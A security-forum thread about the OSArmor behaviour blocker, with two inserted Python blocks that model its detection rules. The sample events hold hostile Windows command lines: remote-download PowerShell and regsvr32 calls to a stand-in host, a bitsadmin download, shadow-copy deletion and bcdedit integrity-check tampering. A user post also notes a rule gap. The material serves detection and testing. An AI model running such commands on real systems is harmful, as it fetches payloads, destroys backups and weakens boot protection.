NoVirusThanks OSArmor

Discussion in 'NoVirusThanks' started by Evjl's Rain, Dec 17, 2017.

  1. Evjl's Rain

    Evjl's Rain Level 29
    Trusted AV Tester

    Apr 18, 2016
    1,815
    13,237
    Vietnam
    Windows 8.1
    Avast
    Official Website:
    http://www.novirusthanks.org/products/osarmor/

    Monitor and block suspicious process behaviors to prevent infections by malware, ransomware, and other threats. This security application analyzes parent processes and prevents, for example, MS Word from running cmd.exe or powershell.exe; it prevents ransomware from deleting shadow copies of files via vssadmin.exe; it blocks processes with double file extensions (i.e. invoice.pdf.exe); it blocks USB-spreading malware; and much more. It monitors commonly exploited processes (such as MS Office, Java, web browsers, Adobe PDF, Flash, etc.) and blocks suspicious child processes, blocking the exploit payloads and thus preventing the malware infection.

    This program is compatible with other security software and adds an additional layer of defense to prevent malware and ransomware infections. So far, we have added more than 30 smart policies to block malicious process behaviors and improve your system security. You don't have to configure anything, just install it and forget about it. If needed, you can enable or disable the policies via the "Configurator" application, which needs Admin privileges.


    An Additional Layer of Defense
    This smart security application focuses on preventing a malware infection by applying smart and intelligent rules that block bad process behaviors. This tool can block threats not detected by your installed security solution. Add to your system an additional layer of defense to prevent infections by malware and ransomware!
    You don't have to configure anything, just install it and forget about it. We have already added more than 30 smart policies to improve your system security with this security application.

    Basic Anti-Exploit
    Analyze parent processes and child processes blocking exploit payloads.

    Protect MS Office Apps
    Prevent WINWORD.EXE or EXCEL.EXE from executing malicious processes.

    Monitor Applications
    Monitor Adobe PDF Reader, MS Office, OpenOffice, Web Browsers, etc.

    Block USB Malware
    Prevent execution of processes started via autorun.inf from USB devices.

    Block Command-Lines
    Block processes with command-line strings commonly related to malware.

    Protect Shadow Copies
    Block system processes (vssadmin.exe, etc) from deleting shadow copies of files.

    Block File Download
    Block specific command-lines related to download of remote files.

    Block .COM & .PIF
    Block execution of processes with .COM or .PIF obsolete file extensions.

    Filter System Processes
    Block wscript.exe, mshta.exe, etc if they match our rules of bad behaviors.

    Block Bcdedit.exe
    Prevent important and critical system modifications via Bcdedit.exe.

    Block Schtasks.exe
    Block the execution of schtasks.exe (commonly used by malware).

    Block Bitsadmin.exe
    Prevent Bitsadmin.exe from downloading (/download) remote files.

    PowerShell Rules
    Block execution of encoded or malformed commands via PowerShell.

    Svchost & Explorer
    Block suspicious behaviors related to Svchost.exe and Explorer.exe.

    Block RegisterXLL()
    Prevent calling of Application.Excel RegisterXLL() via command-line.

    Block Remote Scripts
    Prevent Regsvr32.exe or Mshta.exe from loading remote scripts.

    Very Lightweight
    The software application uses only a few MBs of memory, you will not even notice it.

    Free to Use
    This software is completely free to use for anyone, at home and at work.


    For Windows XP, Vista, 7, 8, 10 (32\64-bit)

    *** Doesn't support Secure Boot for now ***

    Download & more info here:
    Prevent Malware and Ransomware Infections with OSArmor | NoVirusThanks
     
    tonibalas, frogboy, BryanB and 41 others like this.
  2. pablozi

    pablozi Level 22
    Trusted

    Jun 14, 2011
    1,156
    4,928
    Null Island
    Windows 10
    Default-Deny
    Another tool from NVT which will be abandoned after a short period of active development.
     
  3. Peter2150

    Peter2150 Level 6

    Oct 24, 2015
    281
    815
    Washington DC
    Windows 7
    Emsisoft
    And the basis of this claim is....
     
  4. Rengar

    Rengar Level 14

    Jan 6, 2017
    699
    4,436
    Greece
    Windows 8.1
    Avast
    Why are you saying that? lol
     
    BryanB, davisd, given and 7 others like this.
  5. HarborFront

    HarborFront Level 34
    Content Creator

    Oct 9, 2016
    2,305
    5,771
    Far East
    So is this OSArmor the same as NVT ERP or a subset of NVT ERP? With NVT ERP do I still need the OSArmor? Or do I need both for better protection?

    Thanks
     
    BryanB, davisd, rockstarrocks and 8 others like this.
  6. bribon77

    bribon77 Level 11

    Jul 6, 2017
    506
    3,461
    spain
    Windows 7
    Emsisoft
    I have seen it on Wilders and I have installed it in Shadow. I have deactivated all my protection and executed some malware, but I have not perceived any alert... will it be possible to test this application? It looks good, like everything that this developer does. Thank you. :)
     
    BryanB, Andytay70, davisd and 11 others like this.
  7. Evjl's Rain

    Evjl's Rain Level 29
    Trusted AV Tester

    Apr 18, 2016
    1,815
    13,237
    Vietnam
    Windows 8.1
    Avast
    #7 Evjl's Rain, Dec 17, 2017
    Last edited: Dec 17, 2017
    I don't think this app is designed for regular malware with an .exe extension but for scripts and several kinds of malware which fit the criteria in the checkboxes (for example, double-extension malware)

    the only thing I can see it missing is prevention against Java malware, which many AV vendors are not really good at. However, I can understand the reason why

    it's working properly, as it just blocked my Google Chrome portable installer from PortableApps due to its double extension .paf.exe
     
    BryanB, Andytay70, davisd and 16 others like this.
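    The parent/child and command-line policies listed in the first post, together with the .paf.exe false positive reported in post #7, as an added example that is not OSArmor's code and not NoVirusThanks' actual rule set: a small Python model of six of the listed policies run over constructed process-creation events. The event field names (image, parent, cmdline), the file paths, the example.invalid host and the rule names are all assumptions of this example.

```python
"""Model of six OSArmor-style process policies (added example; not OSArmor's own code)."""
import ntpath
import re

# A process-creation event as this example models it (field names are ours, not OSArmor's):
#   image   - full path of the new process
#   parent  - full path of the parent process
#   cmdline - the new process's command line
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def _name(path):
    """Lower-cased file name of a Windows image path; every rule compares on this, never the raw path."""
    return ntpath.basename(path).lower()


def office_spawns_shell(ev):
    """'Protect MS Office Apps': WINWORD/EXCEL must not spawn cmd, PowerShell or a script host."""
    return _name(ev["parent"]) in OFFICE_APPS and _name(ev["image"]) in SCRIPT_HOSTS


def vssadmin_deletes_shadows(ev):
    """'Protect Shadow Copies': 'vssadmin delete shadows' is the usual ransomware pre-step."""
    cmd = ev["cmdline"].lower()
    return _name(ev["image"]) == "vssadmin.exe" and "delete" in cmd and "shadows" in cmd


# Anything like name.xxx.exe: a second extension immediately before an executable one.
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.(?:exe|scr|com|pif)$")


def double_extension(ev):
    """'Block double extensions': invoice.pdf.exe. A pure file-name heuristic, so a legitimate
    PortableApps *.paf.exe installer is caught as well (the false positive from post #7)."""
    return DOUBLE_EXT.search(_name(ev["image"])) is not None


def bitsadmin_download(ev):
    """'Block Bitsadmin.exe': only the /download direction is blocked, as the feature list says."""
    return _name(ev["image"]) == "bitsadmin.exe" and "/download" in ev["cmdline"].lower()


# -EncodedCommand and every unambiguous prefix PowerShell accepts (-e, -ec, -en, -enc, ...).
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?(?=\s|$)", re.IGNORECASE)


def powershell_encoded(ev):
    """'PowerShell Rules': encoded command lines; -ep / -ExecutionPolicy alone do not match."""
    return _name(ev["image"]) == "powershell.exe" and ENCODED_FLAG.search(ev["cmdline"]) is not None


def remote_script_loader(ev):
    """'Block Remote Scripts': regsvr32/mshta handed an http(s) URL on the command line."""
    return (_name(ev["image"]) in {"regsvr32.exe", "mshta.exe"}
            and re.search(r"https?://", ev["cmdline"], re.IGNORECASE) is not None)


RULES = [
    ("office_spawns_shell", office_spawns_shell),
    ("vssadmin_deletes_shadows", vssadmin_deletes_shadows),
    ("double_extension", double_extension),
    ("bitsadmin_download", bitsadmin_download),
    ("powershell_encoded", powershell_encoded),
    ("remote_script_loader", remote_script_loader),
]


def evaluate(ev):
    """Names of every rule the event trips; an empty list means the process is allowed."""
    return [name for name, pred in RULES if pred(ev)]


# Constructed events: paths, hosts and command lines are made up for this example.
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": "cmd.exe /c powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"image": r"C:\Windows\System32\vssadmin.exe", "parent": r"C:\Users\Alice\AppData\Local\Temp\locker.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"image": r"C:\Users\Alice\Downloads\invoice.pdf.exe", "parent": EXPLORER,
     "cmdline": r'"C:\Users\Alice\Downloads\invoice.pdf.exe"'},
    {"image": r"C:\Users\Alice\Downloads\GoogleChromePortable_63.0.3239.108_online.paf.exe",
     "parent": EXPLORER, "cmdline": "GoogleChromePortable_63.0.3239.108_online.paf.exe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"bitsadmin.exe /transfer job /download /priority normal http://example.invalid/x.exe C:\Users\Alice\x.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": EXPLORER, "cmdline": "notepad.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": EXPLORER,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


def run_samples():
    """Evaluate every sample event; returns one list of tripped rule names per event."""
    return [evaluate(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, run_samples()):
        print(f"{'BLOCK' if hits else 'allow':5} {_name(ev['image']):55} {hits}")
```

    Every rule here keys on the image file name plus either the parent name or the command line, which is the whole point of the product description: the decision is made before the payload runs and needs no signature for it. The fourth sample shows the cost of a name-only heuristic, which is exactly what post #7 ran into.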
  8. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,282
    13,635
    Utopia
    The drivers are not yet co-signed, so you might have to disable secure boot to install it on Windows 10. If you ignore the warning and install it anyway, your system will become unbootable until you disable secure boot.

    If your Windows 10 is from an upgrade instead of a clean install, you probably will not have this limitation.
    The dev says he already applied to get sigs for the drivers, and will update the installation file accordingly.
     
  9. pablozi

    pablozi Level 22
    Trusted

    Jun 14, 2011
    1,156
    4,928
    Null Island
    Windows 10
    Default-Deny
    It's just my biased opinion.
    Just look at the website and see how many tools are there.
    Now tell me how many of them are receiving regular updates/fixes?
    Don't get me wrong - I love NVT soft (I even bought ERP license) but it would be better if Andreas could focus on up to 3 main tools instead of creating another tool which will be forgotten after a period of time.
    Anyway I am going to try OSA ;)
     
    tonibalas, BryanB, Andytay70 and 14 others like this.
  10. Peter2150

    Peter2150 Level 6

    Oct 24, 2015
    281
    815
    Washington DC
    Windows 7
    Emsisoft
    There are a bunch and most are relatively simple and don't need updates.
     
    BryanB, davisd, rockstarrocks and 8 others like this.
  11. Prorootect

    Prorootect Level 46

    Nov 5, 2011
    3,588
    3,864
    0wN3D by my cat!
    Ah, I have a big desire for this new tool, developers are trusted!

    - It would be my first downloaded software since time immemorial...
    Thank you Evjl's Rain !
     
  12. AtlBo

    AtlBo Level 22

    Dec 29, 2014
    1,144
    4,519
    Qihoo 360
    Yes, looking forward to running this to see where NVT has gone with this tool. It's interesting to me that the dev here has chosen to make the application free for offices. Honestly, I feel like he should reserve the free-for-the-office decision to make at a later date, personally. He has given away so much good software over the years. This is how I feel.

    I wonder how this would compare on Windows 7 to the work @Andy Ful is doing with his policy-based application (primarily powerful for W10 users?). I guess his is more machine policy control rather than actual establishment of policy, as this seems it actually is for Windows 7. Going to be interesting to see how it works on Windows 7 for sure. A little bit strange to see an app with such simple settings. Makes me nervous for some reason. :rolleyes:

    Any other malware testing done, please pass on your findings! Thanks to @bribon77 for his initial tests. :)
     
  13. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    NVT here :)

    Thank you for posting OSArmor here.

    You may want to watch this video that demonstrates how OSArmor can block the payload of a DOC (MS Word) and SWF (Flash) exploit:


    OSArmor is like a behavioral blocker with pre-built rules that block suspicious processes (in short).
    It works by preventing a malware or ransomware infection in real-world scenario.

    You should test it with real-world scenarios:
    - Opening a malicious .DOC\.PDF\.XLS\etc. file used to exploit MS Word\MS Excel\PDF Reader\etc. to drop\download and execute a payload (malware\ransomware\etc.) in the system
    - Visiting a malicious website that exploits a vulnerability (Java\Flash Player\PDF\etc) to download and execute a payload in the system
    - And so on. Simply clicking on a .exe file or a .vbs file would not trigger any alert.

    OSArmor can also block fileless malware that executes JS or VBS code, i.e. Poweliks:
    Poweliks click-fraud malware goes fileless in attempt to prevent removal

    This tool can really improve the security of the system and requires zero configuration.

    If you have questions just ask, I'll reply here :)
     
    tonibalas, Dacko, BryanB and 31 others like this.
  14. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    @shmu26

    ERP gives you full control over every single application that is installed\executed in the system and is more for advanced users.

    OSArmor is for beginner users (but also for experts), with pre-built rules that require zero configuration, and adds an additional (solid) layer of defense.
     
    tonibalas, Dacko, BryanB and 21 others like this.
  15. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,184
    5,226
    IRAN
    Windows 10
    ESET
    Worth it for free! Even some paid AVs can't do what this free tool can do, right? It is something like Dr.Web KATANA!
     
    Siavash, BryanB, Andytay70 and 9 others like this.
  16. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,282
    13,635
    Utopia
    Thanks for explanations. Is this product designed to work side by side with the new ERP, or will the new ERP still have command line parsing?
     
    BryanB, Andytay70, davisd and 7 others like this.
  17. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    ERP gives you full control over every single application that is installed\executed in the system and is more for advanced users.

    OSArmor is for beginner users (but also for experts), with pre-built rules that require zero configuration, and adds an additional (solid) layer of defense.
     
    ZeroDay, davisd, given and 13 others like this.
  18. Opcode

    Opcode Level 18
    Content Creator

    Aug 17, 2017
    891
    6,325
    Caille
    Windows 10
    The Bcdedit.exe protection doesn't work by preventing the activity itself, it appears that it works by filtering for command line. I attempted to spawn Dbgview.exe with the fake arguments (which would have been appropriate for Bcdedit.exe) and it still got flagged, despite the target not being Bcdedit.exe. So I wouldn't count your chickens.

    Code:
    Date/Time: 12/17/2017 8:59:41 PM
    Process: [1556]C:\Users\PCNAME\Desktop\Dbgview.exe
    Parent: [3724]C:\Windows\System32\cmd.exe
    Rule: BlockModificationsViaBcedit
    Rule Name: Prevent important system modifications via Bcedit.exe
    Command Line: dbgview.exe  -set loadoptions DDISABLE_INTEGRITY_CHECKS
    Signer: Microsoft Corporation
    
    Strangely, it doesn't flag for TESTSIGNING being enabled. You can use that instead of DDISABLE_INTEGRITY_CHECKS and it won't be flagged?

    However, there's no self-protection. You need to have administrator rights to use the original Bcdedit.exe, and you can break the service for this product with Administrator rights too... Same for editing the config for it in the Registry! So that feature isn't that reliable.

    Still useful and decent though. It can be very handy for additional protection, and I like how the user interface is simple to use. All the settings are right there in front of you with hardly any effort at all: ease of use, which is a good thing. After all, it is a free product, which is really nice and kind of them. The alerts UI looks nice too, but it would be good to have details put on there.
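    The two defects Opcode's log shows, a command-line-only match that flags a decoy Dbgview.exe and a switch list that misses TESTSIGNING, side by side with a hardened rule, as an added example that is not OSArmor's code and does not claim to reproduce its implementation: the naive rule only models the two observations above. The event field names, the `original_filename` field (standing in for the PE version resource's OriginalFilename, which Sysmon and most EDRs record), the extra bcdedit switches beyond the two named in the thread, and the sample paths are assumptions of this example.

```python
"""Why a command-line-only bcdedit rule both over- and under-matches (added example; not OSArmor's code)."""
import ntpath
import re

# bcdedit switches that weaken boot integrity or disable recovery. The first two are the ones
# discussed in the thread (DDISABLE_INTEGRITY_CHECKS, TESTSIGNING); the rest are well-known
# ransomware pre-steps added here for completeness. Both "-set" and "/set" spellings are accepted,
# with or without a {guid} / {current} identifier.
DANGEROUS = re.compile(
    r"[/-]set\s+(?:\{[^}]+\}\s+)?(?:"
    r"loadoptions\s+\S*ddisable_integrity_checks"
    r"|nointegritychecks\s+on"
    r"|testsigning\s+on"
    r"|recoveryenabled\s+no"
    r"|bootstatuspolicy\s+ignoreallfailures"
    r")",
    re.IGNORECASE,
)


def naive_rule(ev):
    """Models the two behaviours Opcode observed: the rule keys on the command line alone, so any
    image carrying the integrity-check switch trips it, and 'testsigning on' is not covered."""
    return "ddisable_integrity_checks" in ev["cmdline"].lower()


def hardened_rule(ev):
    """Scope the rule to bcdedit itself, then match the full list of dangerous switches.

    A renamed copy of bcdedit.exe evades a plain file-name check, so the PE OriginalFilename is
    consulted as well. Here that is an 'original_filename' field on the event (an assumption of
    this example; a real hook would read it from the image's version resource)."""
    names = {ntpath.basename(ev["image"]).lower(), ev.get("original_filename", "").lower()}
    if "bcdedit.exe" not in names:
        return False
    return DANGEROUS.search(ev["cmdline"]) is not None


def compare(ev):
    """(naive verdict, hardened verdict) for one event; True means 'block'."""
    return naive_rule(ev), hardened_rule(ev)


BCDEDIT = r"C:\Windows\System32\bcdedit.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed events. The first reproduces the Dbgview.exe decoy from Opcode's log line.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\PCNAME\Desktop\Dbgview.exe", "parent": CMD, "original_filename": "Dbgview.exe",
     "cmdline": "dbgview.exe  -set loadoptions DDISABLE_INTEGRITY_CHECKS"},
    {"image": BCDEDIT, "parent": CMD, "original_filename": "bcdedit.exe",
     "cmdline": "bcdedit.exe -set TESTSIGNING ON"},
    {"image": BCDEDIT, "parent": CMD, "original_filename": "bcdedit.exe",
     "cmdline": "bcdedit /set {current} nointegritychecks on"},
    {"image": r"C:\Users\PCNAME\AppData\Local\Temp\b.exe", "parent": CMD, "original_filename": "bcdedit.exe",
     "cmdline": "b.exe /set loadoptions DDISABLE_INTEGRITY_CHECKS"},
    {"image": BCDEDIT, "parent": CMD, "original_filename": "bcdedit.exe", "cmdline": "bcdedit /enum"},
    {"image": BCDEDIT, "parent": CMD, "original_filename": "bcdedit.exe",
     "cmdline": 'bcdedit /set {default} description "Windows 10"'},
]


def run_samples():
    """One (naive, hardened) pair per sample event."""
    return [compare(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, (naive, hard) in zip(SAMPLE_EVENTS, run_samples()):
        print(f"naive={naive!s:5} hardened={hard!s:5}  {ev['cmdline']}")
```

    The first sample is the false positive from the log (blocked by the naive rule, allowed by the hardened one), the second is the TESTSIGNING miss, and the fourth shows why scoping on the file name alone is not enough: a copied bcdedit.exe under another name is still bcdedit. None of this changes Opcode's other point, that a rule enforced by a user-mode service an administrator can stop, or whose configuration lives in a writable registry key, adds nothing against an attacker who already has the admin rights bcdedit itself requires.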
     
  19. bribon77

    bribon77 Level 11

    Jul 6, 2017
    506
    3,461
    spain
    Windows 7
    Emsisoft
    Thank you for being here on MT. There are many of us who like your programs. :)
     
  20. NoVirusThanks

    NoVirusThanks From NoVirusThanks
    Developer

    Aug 23, 2012
    55
    761
    Italy
    Windows 10
    @Opcode

    We'll add self-protection (for the service only) in the next release, and we'll also add support for blocking "bcdedit.exe -set TESTSIGNING OFF" within the rule "Prevent important system modifications via Bcedit.exe", thanks for reporting it :)
     
    BryanB, ZeroDay, davisd and 17 others like this.